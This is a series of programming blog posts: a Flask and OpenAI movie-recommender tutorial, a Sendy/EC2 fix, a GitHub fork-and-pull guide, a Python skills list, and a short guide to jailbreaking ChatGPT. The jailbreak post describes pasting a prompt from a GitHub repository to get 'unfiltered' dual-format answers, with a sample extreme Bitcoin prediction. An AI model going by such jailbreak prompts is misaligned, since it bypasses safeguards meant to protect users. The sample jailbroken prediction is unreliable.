Whether you’re a seasoned Python developer or just starting out, we hope this article has provided you with valuable insights and practical tips on how to use Pylint effectively.

πŸ‘‰ Recommended: 7 Tips to Clean Code


Building a Movie Recommendation App with ChatGPT


In this article, I will show you how I have built a simple but quite powerful movie recommendation app.

πŸ’» Try It Yourself: You can play with the live demo here.

YouTube Video

I built it for two reasons:

  • (i) to keep educating myself on modern technologies,
  • (ii) to see which movies can entertain me on a weekend night.

This app uses Python, HTML/CSS, Flask, Vercel, and the OpenAI API capabilities.

Prerequisites

Files in this project

Here is the snapshot of my code from GitHub.

The key files are these:

  • .env
  • api/index.py
  • api/templates/index.html

First, I use the .env file and add my secret key.

FLASK_APP=app
FLASK_DEBUG=1
OPENAI_API_KEY=sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Then goes the Python file.

import os

import openai
from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
openai.api_key = os.getenv("OPENAI_API_KEY")


@app.route("/", methods=("GET", "POST"))
def index():
    if request.method == "POST":
        category = request.form["category"]
        number = request.form["number"]
        response = openai.Completion.create(
            model="text-davinci-003",
            prompt=generate_prompt(number, category),
            temperature=0.5,
            max_tokens=60,
            top_p=1,
            frequency_penalty=0,
            presence_penalty=0,
        )
        return redirect(url_for("index", result=response.choices[0].text))
    result = request.args.get("result")
    return render_template("index.html", result=result)


def generate_prompt(number, category):
    return """Recommend the best {} {} movies to watch:""".format(
        number, category.capitalize()
    )


if __name__ == "__main__":
    app.run(host="127.0.0.1", port=5050, debug=True)

The imports I use are the following:

  • os – to read environment variables (like the API key) from the operating system
  • openai – to get the best of OpenAI artificial intelligence
  • flask – a lightweight web framework that handles the routing and renders the HTML frontend

Some Flask basics. 

@app.route("/", methods=("GET", "POST"))

This decorator registers the main route (and the only one in this app). You can think of it as the main URL, whether it is localhost/ or www.mysite.com/.

The following function index() takes the information submitted via the HTML form (see index.html) and prepares the data to be displayed back on the index.html page.

Here’s what happens the moment you hit the β€œGenerate titles” button on your site:

  • index() function takes the input being β€œnumber” and β€œcategory” from the form,
  • feeds it into the generate_prompt() function, 
  • which crafts and passes back a question to be asked,
  • which then – via the API – is sent to OpenAI to get a β€œresponse”, 
  • that is then passed as β€œresult” onto index.html to render on the screen.
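To see the prompt crafting in isolation, here is the generate_prompt() logic from index.py as a standalone snippet you can run without Flask or an API key:

```python
def generate_prompt(number, category):
    # Same string formatting as in api/index.py: count + capitalized genre.
    return """Recommend the best {} {} movies to watch:""".format(
        number, category.capitalize()
    )

print(generate_prompt("3", "thriller"))
# → Recommend the best 3 Thriller movies to watch:
```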

Let’s also have a look at the index.html file.

<!DOCTYPE html>
<head>
    <title>OpenAI Movies</title>
    <link rel="shortcut icon" href="{{ url_for('static', filename='movie.png') }}" />
    <link rel="stylesheet" href="{{ url_for('static', filename='main.css') }}" />
</head>
<body>
    <img src="{{ url_for('static', filename='movie.png') }}" class="icon" />
    <h3>Recommend the top movies</h3>
    <form action="/" method="post">
        <input type="text" name="number" placeholder="How many proposals, e.g. 1,3,10" required />
        <input type="text" name="category" placeholder="Enter the category e.g. thriller, comedy" required />
        <input type="submit" value="Generate titles" />
    </form>
    {% if result %}
    <div class="result">
        <pre>{{ result | safe }}</pre>
    </div>
    {% endif %}
</body>

I will not go over the HTML tags as these should be familiar to you, and if not, you can get yourself up to speed with that using other web sources.

Initially, the file will feel like an ordinary HTML/CSS site, but after a while, you will notice a strange animal.  It is placed here at the bottom of the file.

{% if result %}
<div class="result">
    {{ result }}
</div>
{% endif %}

This is where Python co-exists with HTML: it allows the “result” that we generate in our “Python backend” to be passed over to the “Flask frontend”. If the result exists, Flask’s Jinja template engine renders the website with the results at the bottom.
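You can watch this hand-off in isolation with the jinja2 package (the template engine Flask uses under the hood), assuming it is installed in your environment:

```python
from jinja2 import Template

# The same conditional block as in index.html, rendered directly.
template = Template(
    '{% if result %}<div class="result">{{ result }}</div>{% endif %}'
)

# With a result, the div is rendered; without one, the output is empty.
print(template.render(result="1. The Godfather"))
print(repr(template.render()))
```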

Run the App Locally

Running an app is simple. I just run the index.py file.

With the β€œhost” and β€œport” attributes specified in the index.py file, Flask will run a local web server with the site.

This is how it looks in my Visual Studio Code:

And this is the browser view:

Vercel deployment

Alright, the app is built and works fine on my local machine. 

Now – let’s get it shipped to the world!

First, I put the whole project into my personal GitHub repo. I am using a public one just so that you and other readers can use it. Yet, if you follow my steps here, I would suggest a private one to you.

πŸ›‘ Warning: The risk with public repo is that it exposes your OpenAI secret key to the world! That would be identified anyways, and your key would rotate, but why bother?

Now, I log in to the Vercel dashboard and click on β€œAdd New…” and select β€œProject”.

Selecting GitHub as Git provider.

Selecting the repository and importing it.

Arrived at the β€œYou’re almost done.” page. There is no need to alter any of the default parameters there except adding one important variable. In environment variables, I add my own unique OPENAI_API_KEY.

Making sure this is indeed saved properly.

This is it. Hitting β€œDeploy” and watching the wheels spin.

Vercel builds it for me and assigns some public domains to the app.

Once I arrive at the final page, I open up the app, test it again and if all works ok, share with the family & friends & Finxter readers! 

If you liked this journey, you can give me a star in my GitHub repo or this article πŸ˜‰ 

Any doubts or comments, drop me a line.

πŸ’» Try It Yourself: You can play with the live demo here.

Happy coding!

Get Your Personal Certificate Proving Your ChatGPT-Powered Coding Skills

If you’re a premium member, you can also go through this mini-course project on the Finxter Academy and certify your newly-acquired skills.

I’m sure many employers and clients would love to hire coders that can use the latest technological disruptions to build advanced applications (that are also easy to develop). πŸ˜‰


[Fixed] Sendy Loading Lists Not Working (Loads Forever)


If you’re landing here, chances are you run a Sendy instance on Amazon EC2 hosting “Simple Email Service (SES)” for email marketing and experience the following problem:

  • Error 1: “View All Lists” Not Working/Loading
  • Error 2: “Send Newsletter Now!” Not Working/Loading (Recipients loads forever)

Here’s a screenshot on my Sendy instance — the lists don’t load!

Error 1: “View All Lists” Not Working/Loading
Error 2: “Send Newsletter Now!” Not Working/Loading (Recipients loads forever)

How to Fix?

To fix these two errors, you most likely need a bigger Amazon EC2 instance. By default, Sendy’s setup uses Amazon’s t2.micro instance type, which has only 1 GiB of memory.

For large lists, however, this is not enough. The instance is likely overwhelmed with all the list data if you have, say, 100k+ subscribers. To cope with the small memory, the instance has to swap parts of the “memory data” (i.e., the list) to disk, which reduces performance by orders of magnitude. Hence the timeout on all major browsers.

Amazon EC2 instance types

How to Upgrade the EC2 Instance Running Sendy?

To increase the capabilities of your instance and fix this error, just follow these three steps:

  • Step 1: Stop the instance at the Amazon EC2 region: https://eu-central-1.console.aws.amazon.com/ec2/home
  • Step 2: Wait for the instance to stop and change the instance type from t2.micro to t2.small to double its memory capabilities. If you need more power later, try to increase it even more. See instance types here.
  • Step 3: Restart the instance again. And voilΓ  – your Sendy installation should work again!

See here: https://sendy.co/forum/discussion/669/ec2-micro-strong-enough-to-sendy-50k-mails

I hope this worked for you – thanks for checking out this tutorial! β™₯


How to Jailbreak ChatGPT (… and What’s 1 BTC Worth in 2030?)


ChatGPT has reduced the price for intelligence by 10,000x.

However, many believe the answers are too politically correct, woke, or generic.

For example, ask ChatGPT about the price of Bitcoin in the year 2030 and you’ll get the following mouthful:

Boooooring! πŸ₯±

To play with a more interesting version of ChatGPT and get “unfiltered” and sometimes extreme answers, you must jailbreak it.

For example, here’s ChatGPT’s answer on the price of Bitcoin after you jailbreak it:

1 billion USD per BTC. That’s more like it! 🀯

But how do you actually “set ChatGPT free”?

Step 1: Visit GitHub Jailbreak Repository

Visit the GitHub repository https://github.com/gayolGate/gayolGate/blob/index/ChatGPTJailbreak and copy the whole prompt of the single ChatGPTJailbreak file in the repository.

Step 2: Open ChatGPT and Paste the Whole Prompt

Go to https://chat.openai.com and paste the whole GitHub jailbreaking prompt into the first Chat prompt.

Step 3: ChatGPT is Now Free!

Congratulations, ChatGPT is now free. You can ask it anything, and it will always give you the answer in two formats:

  • [🔒CLASSIC] This is the standard answer you’d receive without the jailbreak.
  • [🔓JAILBREAK] This is the “free” answer without limitations.

Just don’t trust it blindly because it’s “free”. Jailbreaking doesn’t mean ChatGPT suddenly knows the answer; it just means it will give you an answer, and its behavior is more unconstrained and radical (and, possibly, more harmful as well).

Have fun — and use your new power wisely and responsibly! βœ…πŸ•Š


GitHub Fork and Pull Workflow


If you are unfamiliar with git and/or GitHub, it can be overwhelming navigating all the different workflow models you can use to add code to a repository. I know this feeling well, as it took me a while to get used to new workflows after being used to the classic SVN (years ago in University).

This post will focus on the common fork and pull workflow model that is used by many GitHub repositories. It will provide the necessary git commands and a short description for each step of the workflow, specifically for Git beginners who may be hesitant to contribute to GitHub.

πŸ’‘ Definition: A repository is a central location that holds data. It’s mostly used to store and manage code, documents, images, videos, and other data types. Repositories can be either public or private and are often used by software developers to store and collaborate on projects.

Fork and Pull Workflow In a Nutshell

The “Fork & Pull” workflow is a way to contribute changes to an original repository using three easy steps:

  • Step 1: create a personal copy (fork) of the repository,
  • Step 2: edit the fork, and
  • Step 3: submit a request (pull request) to the owner of the original repository to merge your changes.

Step 1: Create a Fork

πŸ’‘ Definition: A fork is a copy of a repository. Forking a repository allows you to freely experiment with changes without affecting the original project. Forks are commonly used to either propose changes to someone else’s project or to use someone else’s project as a starting point for your own idea.

Creating a fork on GitHub is easy – just click the “Fork” button on the repository page.

Here’s what forking the TensorFlow repository looks like — easy:

Step 2: Clone and Edit Fork

Once you have your fork, you can clone it to your local machine and edit it.

Here’s where you actually change or add code files, find and remove bugs, write comments for the code, or refactor everything.

πŸ’‘ Definition: If you clone a Git repository, you essentially create an identical copy. You clone to work on your own local copy of the repository and sync changes back to the original repository. This is useful for keeping your local copy up to date with the latest changes and for contributing changes back to the original repository.

Step 3: Push Changes to Fork and Perform Pull Request

When you are done, you push your changes back to the fork on GitHub.

πŸ’‘ Definition: A Git push operation is the process of sending changes from a local repository to a remote repository. The changes are applied to the remote repository. And your local repository is synchronized with the remote repository.

Lastly, you submit a pull request to the owner of the original repository.

πŸ’‘ Definition: A pull request is a request to merge a branch into the main branch of a repository. It is used to propose changes and request feedback from other contributors, who can accept or reject the changes based on their review.

If there are no merge conflicts, the owner can simply click the “merge” button to accept your changes.

Six Steps to Pull Request

To create a pull request, you need to:

  1. Fork the repository on GitHub.
  2. Clone your fork to your workspace with the git clone command.
  3. Modify the code and commit the changes to your local clone.
  4. Push your changes to your remote fork on GitHub.
  5. Create a pull request on GitHub and wait for the owner to merge or comment on your changes.
  6. If the owner suggests changes, push them to your fork, and the pull request will be updated automatically.
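The whole cycle can be dry-run locally with nothing but git. In the sketch below, a bare repository stands in for the upstream GitHub repository and a second clone stands in for your fork; all paths are throwaway:

```shell
set -e
tmp=$(mktemp -d) && cd "$tmp"

# A bare repo plays the role of the original (upstream) GitHub repository.
git init -q --bare upstream.git

# The owner seeds it with an initial commit.
git clone -q upstream.git owner && cd owner
git config user.email owner@example.com && git config user.name Owner
echo "hello" > README.md
git add README.md && git commit -qm "initial commit"
git push -q origin HEAD
cd ..

# Steps 1-3: "fork" (second clone), feature branch, commit.
git clone -q upstream.git fork && cd fork
git config user.email dev@example.com && git config user.name Dev
git checkout -qb my-feature
echo "new feature" >> README.md
git add README.md && git commit -qm "add feature"

# Step 4: push the branch; on GitHub you would now open the pull request.
git push -q origin my-feature

# Steps 5-6: the owner reviews and merges -- the equivalent of accepting the PR.
cd ../owner
git fetch -q origin
git merge -q origin/my-feature
grep "new feature" README.md
```

On GitHub, the merge step happens through the web UI instead of a manual git merge, but the underlying plumbing is exactly this.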

What If Multiple Devs Work In Parallel?

If multiple developers work in parallel on the same repository, it may happen that they work on step 3 in parallel and try to push changes to the remote fork at the same time.

Here’s my drawing of this scenario. πŸ˜†

To keep your fork in sync, first add the original repository as a remote repository called “upstream”:

git remote add upstream https://github.com/OWNER/REPOSITORY.git

Fetch all changes from the upstream repository:

git fetch upstream

Switch to the master branch of your fork:

git checkout master

Merge changes from the upstream repository into your fork:

git merge upstream/master

If you are working on multiple features, you should isolate them from each other. To do this, create a separate branch for each feature.

  • Use the command git checkout -b BRANCHNAME to create and switch to a new branch.
  • Upload the branch to the remote fork with git push --set-upstream origin BRANCHNAME.
  • To switch between branches, use git checkout BRANCHNAME.
  • To create a pull request from a branch, go to the GitHub page of that branch and click the β€œpull request” button.

To update a feature branch:

  1. Switch to the feature branch: git checkout my-feature-branch
  2. Commit all changes: git commit -m MESSAGE
  3. Update the feature branch by rebasing it from the master branch: git rebase master

Why I Wrote This

I wrote this short tutorial to help contributors to our real-world practical project: building a P2P social network for information dissemination that is structured like a big brain. Users are neurons. Connections are synapses. Information impulses spread through neurons “firing” and travel over synapses in a decentralized way:

πŸ‘‰ Recommended: Peer Brain – A Decentralized P2P Social Network App

If you like the tutorial and you want to contribute to this open-source social network app, feel free to try out this workflow yourself on this GitHub repository!

Summary

The Fork and Pull Workflow is a popular collaboration model used during software development.

In this workflow, a user forks a repository from an original (=upstream) repository, then develops and maintains a separate copy of the codebase on their own fork.

Users can then make changes to their own version of the repository, commit them, and push them up to their own fork. If the user wants to contribute their changes back to the upstream repository, they can then create a pull request. This allows the upstream maintainer to review the changes and determine if they should be merged into the main codebase.

The Fork and Pull Workflow is so popular for collaboration on a common code base because developers can work independently on the code and synchronize on the upstream repos in a well-structured and organized way.

This workflow also benefits upstream maintainers, as they don’t have to manage multiple contributions coming in from multiple sources.

πŸ‘‰ Recommended: Peer Brain – A Decentralized P2P Social Network App


10 Essential Skills for Python Practitioners and Tools to Master Them (2023)


Python is one of the most powerful and versatile programming languages available today. It is used in multiple fields, including web development, data science, artificial intelligence, and more.

As a result, Python practitioners need to have a broad range of skills to be successful. Here, we will discuss the top 10 skills to learn as a Python practitioner.

Note that I focused only on coding-related skills, not on soft skills such as communication or “agile software development”. These are vital but not part of this article.

Skill #1: Object-Oriented Programming (OOP)

Object-Oriented Programming (OOP) is a programming paradigm that uses objects and classes to organize and manage code.

πŸ‘‰ Recommended: Python Classes — An Introduction

OOP is a fundamental skill for Python practitioners, as it allows for the creation of efficient, robust, and reusable code. To be an effective Python programmer, you must understand the principles of OOP and be able to apply them in your code.

Specific subskills to master:

  • Classes and objects
  • Inheritance and composition
  • Encapsulation
  • Polymorphism
  • Magic (dunder) methods

Skill #2: Data Structures and Algorithms

Data Structures and Algorithms are essential for any programmer. Data Structures are collections of data that are organized in a specific way, such as an array or linked list. Algorithms are sets of instructions used to solve specific problems. Knowing how to work with and optimize data structures and algorithms are essential for any Python practitioner.

Specific subskills to master:

  • Lists, tuples, dictionaries, and sets
  • Stacks and queues
  • Sorting and searching algorithms
  • Big O notation
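As a tiny taste of this skill, here is how two classic data structures map onto Python’s built-ins: a stack via list and a queue via collections.deque:

```python
from collections import deque

# Stack (LIFO): list.append() and list.pop() are O(1) at the end.
stack = []
stack.append("task1")
stack.append("task2")
print(stack.pop())      # → task2 (last in, first out)

# Queue (FIFO): deque gives O(1) appends and pops at both ends,
# whereas list.pop(0) would be O(n).
queue = deque()
queue.append("task1")
queue.append("task2")
print(queue.popleft())  # → task1 (first in, first out)
```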

Skill #3: Web Development

Web Development is the process of building, creating, and maintaining websites and web applications. Python is a popular choice for web development, as it is relatively easy to learn and offers a wide range of tools and frameworks. Developing web applications with Python is a must-have skill for Python practitioners.

πŸ‘‰ Recommended: Full-Stack Web Developer — Income and Opportunity

Specific subskills to master:

  • Flask
  • Django
  • FastAPI
  • HTML/CSS basics

Skill #4: Machine Learning (ML)

Machine Learning (ML) is a subset of Artificial Intelligence (AI) that enables machines to learn from data and make predictions. Python has become the go-to language for ML due to its rich and powerful libraries. To be successful in ML, Python practitioners must understand the fundamentals of ML and be able to work with ML libraries and frameworks.

Specific subskills to master:

  • scikit-learn
  • TensorFlow
  • Keras
  • PyTorch

Skill #5: Data Analysis

Data Analysis is the process of gathering, cleaning, and interpreting data to generate insights and inform decisions. Python is an excellent language for data analysis due to its powerful libraries and tools. Knowing how to work with data in Python is an essential skill for any Python practitioner.

Specific subskills to master:

  • Pandas
  • NumPy
  • SciPy
  • Jupyter notebooks

Skill #6: Automation

Automation is the process of using programming to automate mundane or repetitive tasks. Python is a popular choice for automation due to its easy-to-learn syntax and powerful libraries. Knowing how to use Python for automation can save time and allow for more efficient workflows.

Specific subskills to master:

  • Bash
  • Ansible
  • Puppet
  • Chef

Skill #7: GUI Development

GUI Development is the process of creating graphical user interfaces (GUIs) for applications. Python offers a wide range of GUI development frameworks and libraries, making it an excellent choice for GUI development. To be successful in GUI development, Python practitioners must know how to work with GUI frameworks and libraries.

Specific subskills to master:

  • Tkinter
  • PyQt
  • PyGTK
  • wxPython
  • PyGUI

Skill #8: Web Scraping

Web Scraping is the process of extracting data from websites. Python is an excellent language for web scraping due to its powerful libraries and tools. Knowing how to scrape websites using Python is an essential skill for any Python practitioner.

Specific subskills to master:

  • requests
  • BeautifulSoup
  • Scrapy
  • Selenium

Skill #9: Scripting

Scripting is the process of writing scripts to automate mundane or repetitive tasks. Python is a popular language for scripting due to its easy-to-learn syntax and powerful libraries. Knowing how to script in Python can save time and allow for more efficient workflows.

Specific subskills to master:

  • The os, sys, and pathlib modules
  • argparse
  • Regular expressions (re)
  • File handling

Skill #10: Data Visualization

Data Visualization is the process of creating visual representations of data. Python offers a wide range of data visualization libraries and tools, making it an excellent choice for data visualization. Knowing how to create effective visualizations with Python is an essential skill for any Python practitioner.

Specific subskills to master:

  • Matplotlib
  • Seaborn
  • Plotnine (Python port of ggplot2)
  • Bokeh
  • Plotly
  • Dash

πŸ“– Further Learning: For a complete guide on how to build your beautiful dashboard app in pure Python, check out our best-selling book Python Dash with San Francisco Based publisher NoStarch.

Conclusion

In conclusion, the top 10 skills to learn as a Python practitioner are object-oriented programming, data structures and algorithms, web development, machine learning, data analysis, automation, GUI development, web scraping, scripting, and data visualization.

Each of these skills is essential for success as a Python practitioner and can help you create powerful and efficient applications.

πŸ‘‰ Recommended: 20 Real-Life Skills You Need as a UI Developer in 2023